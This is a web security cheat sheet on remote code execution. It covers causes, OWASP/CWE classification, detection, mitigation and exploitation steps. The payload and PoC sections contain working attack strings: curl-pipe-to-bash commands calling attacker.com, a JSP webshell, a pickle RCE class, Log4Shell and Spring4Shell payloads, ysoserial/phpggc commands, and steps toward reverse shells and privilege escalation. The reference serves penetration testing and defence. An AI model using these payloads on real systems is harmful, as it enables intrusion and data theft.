Remote Code Execution (RCE) | Web Security

🧠 Description

What is RCE?

Remote Code Execution allows an attacker to execute arbitrary code on the target server. This is often the most severe vulnerability, leading to full system compromise, data theft, ransomware, or lateral movement.

Why does it occur?

Unsafe deserialization of user input
Command injection via system calls
Vulnerable libraries or frameworks (Log4Shell, Spring4Shell, etc.)
File upload leading to webshell
Template injection (SSTI) that allows code execution

Security principle violated: Input Validation, Secure Configuration, Least Privilege

🏷️ Classification

Type: Remote Code Execution
OWASP: A03:2021 – Injection (when via injection) / A08:2021 – Software and Data Integrity Failures (when via deserialization)
CWE: CWE-94, CWE-502, CWE-78, CWE-74

🎯 Attack Surface

✅ Deserialization endpoints (Java, PHP, Python, .NET)
✅ System command execution features (ping, traceroute, convert)
✅ File upload (webshell)
✅ Template engines (SSTI)
✅ Expression language injection (EL, OGNL, SpEL)
✅ Vulnerable third‑party libraries (e.g., Log4j, Fastjson, XStream)

🔍 Detection Methodology

1. Static Analysis

Search for dangerous functions: eval(), exec(), Runtime.exec(), ProcessBuilder, unserialize(), pickle.loads(), yaml.load() (unsafe)
Check for deserialization of user input without type whitelisting

2. Dynamic Analysis

Inject sleep payloads (sleep(5), ping -c 5 attacker.com) to detect command injection
Send malicious serialized objects (e.g., ysoserial payloads) to deserialization endpoints
Upload webshell and try to access it

Tools: ysoserial, Burp Suite, custom scripts, nuclei templates

💣 Basic Payloads

# Command injection style
; ping -c 5 attacker.com
| curl http://attacker.com/revshell.sh | bash
`id`

# PHP eval


# JSP
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

# Python pickle (deserialization)
import pickle, os, base64
class RCE:
    def __reduce__(self):
        return (os.system, ('id',))
print(base64.b64encode(pickle.dumps(RCE())))

🚀 Advanced Payloads / Bypass

# Log4Shell (CVE-2021-44228)
${jndi:ldap://attacker.com/exploit}

# Spring4Shell (CVE-2022-22965)
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25{5}i&suffix=.jsp

# ysoserial (Java deserialization)
java -jar ysoserial.jar CommonsCollections5 'curl http://attacker.com/rev' | base64

# PHP‑GGC (PHP deserialization)
phpggc Monolog/RCE1 system 'id' --json

🧪 Test Cases (STRICT)

Step	Action	Expected	Actual
1	Inject `; sleep 5` in parameter	5‑second delay	Time‑based RCE confirmed
2	Send malicious serialized object	Command executed or error	Deserialization RCE
3	Upload webshell.php and access	Remote command output	File upload RCE

⚙️ Exploitation Steps

Identify injection point (deserialization, command, upload, template).
Test with harmless delay payload (e.g., sleep 5).
If delay works, attempt to read a file (cat /etc/passwd).
Establish a reverse shell for interactive access.
Escalate privileges on the compromised host.

🛡️ Mitigation

✅ Avoid deserialization of untrusted data; use allowlists
✅ Never use system() or exec() with user input; use safe APIs
✅ Keep frameworks and libraries updated (patch known RCEs)
✅ Run applications with least privilege
✅ Use WAF with virtual patching for known RCE exploits
✅ Implement input validation and output encoding

⚠️ Risk / Impact

Severity: Critical

Impact: Full server compromise, data breach, ransomware, lateral movement, persistence.

📎 Proof of Concept (PoC)

# Command injection based RCE
curl "https://target.com/ping?ip=127.0.0.1; curl https://attacker.com/rev.sh | bash"

# Deserialization RCE (Java)
curl -X POST https://target.com/deserialize -H "Content-Type: application/json" -d '{"data":"rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ..."}'

# Log4Shell RCE
curl -H "User-Agent: ${jndi:ldap://attacker.com/a}" https://target.com/search

📌 Remote Code Execution (RCE)